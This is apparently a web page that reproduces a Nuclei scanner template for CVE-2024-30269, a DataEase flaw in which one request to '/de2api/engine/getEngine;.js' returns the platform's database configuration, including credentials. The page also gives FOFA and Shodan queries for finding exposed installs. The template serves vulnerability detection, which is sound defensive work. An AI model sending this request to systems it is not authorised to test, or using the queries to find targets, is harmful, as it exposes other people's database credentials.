Skip to content

DataEase <= 2.4.1 - Sensitive Information Exposure

ID: CVE-2024-30269

Severity: medium

Author: s4e-io

Tags: cve,cve2024,dataease,exposure

DataEase, an open source data visualization and analysis tool, has a database configuration information exposure vulnerability prior to version 2.5.0. Visiting the /de2api/engine/getEngine;.js path via a browser reveals that the platform’s database configuration is returned.

id: CVE-2024-30269
info:
name: DataEase <= 2.4.1 - Sensitive Information Exposure
author: s4e-io
severity: medium
description: |
DataEase, an open source data visualization and analysis tool, has a database configuration information exposure vulnerability prior to version 2.5.0. Visiting the `/de2api/engine/getEngine;.js` path via a browser reveals that the platform's database configuration is returned.
remediation: The vulnerability has been fixed in v2.5.0
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-30269
- https://github.com/dataease/dataease/security/advisories/GHSA-8gvx-4qvj-6vv5
- https://github.com/dataease/dataease
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-30269
cwe-id: CWE-200
epss-score: 0.00043
epss-percentile: 0.09595
metadata:
verified: true
max-request: 1
vendor: dataease
product: dataease
fofa-query: body="dataease"
shodan-query: http.html:"dataease"
tags: cve,cve2024,dataease,exposure
http:
- method: GET
path:
- "{{BaseURL}}/de2api/engine/getEngine;.js"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "username", "password", "port", "name\":", "pid\":")'
- 'contains(content_type,"application/json")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100bd9e8afe392ebff66307ccc0e5754beac902d1467dba60fa3700b4f72d3965b402206efa1fc319d84a7423b8315d46078d55bd438f937654a9083bc0be7857307c2f:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-30269.yaml"

View on Github